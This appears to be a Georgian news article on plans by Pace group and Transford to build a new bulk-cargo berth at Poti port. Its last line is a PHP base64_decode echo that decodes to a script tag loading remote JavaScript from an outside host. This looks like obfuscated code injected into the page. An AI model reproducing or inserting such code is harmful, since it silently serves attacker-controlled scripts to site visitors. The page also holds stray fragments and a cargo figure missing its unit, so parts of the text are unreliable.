celsiusi
ავერსი შნაიდერი

„სატრანსპორტო კოლაფსს რეგიონის თითქმის ყველა სახელმწიფო მოუმზადებელი დახვდა, რამაც ტვირთბრუნვის შეფერხება გამოიწვია. არსებული ხარვეზების გაანალიზების შემდეგ, ახალი ინფრასტრუქტურის შექმნაზე და ინვესტიციების განხორციელებაზე დავიწყეთ ფიქრი და ახლა დანამდვილებით შეგვიძლია გითხრათ, რომ ფოთში გადაწყვეტილია ახალი ნავმისადგომის მშენებლობა, რომელიც უახლოეს მომავალში დაიწყება და ის უმეტესწილად ნაყარ ტვირთებზე იქნება სპეციალიზებული“, - განაცხადა ვასილ მაზიაშვილმა.

Transford-ის აღმასრულებელი დირექტორის განმარტებითვე, ახალი ინფრასტრუქტურული პროექტი ავტომატიზებული კონვეიერული სისტემით იქნება აღჭურვილი და ის სასაწყობო მეურნეობიდან გემში ტვირთის მიწოდებას ე.წ. shiploader-ის მეშვეობით უზრუნველყოფს.

რაც შეეხება ტვირთბრუნვას, წინასწარი გათვლებით, ახალი ნავმისადგომის ტვირთბრუნვა 1-1.5 მილიონ ტონას მიაღწევს, რაც იმას გულისხმობს, რომ ორი ახალი ნავმისადგომის მეშვეობით Pace ჯგუფი დამატებით 2.5-2.7 ტონა ტვირთვის მომსახურებას შეძლებს.

ვასილ მაზიაშვილის განცხადებით, ინვესტიციის წინასწარი მოცულობა $50 მილიონს აღწევს - საპროექტო სამუშაოებთან დაკავშირებით ტენდერი გამოცხადებულია.

"$50 მილიონის ინვესტირების შემდეგ, PACE ჯგუფის მიერ "ფოთის ახალ საზღვაო ნავსადგურში" განხორციელებული ინვესტიციის მოცულობა $170 მილიონს გადააჭარბებს", - აღნიშნა "ტრანსფორდის" დირექტორმა.

685
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");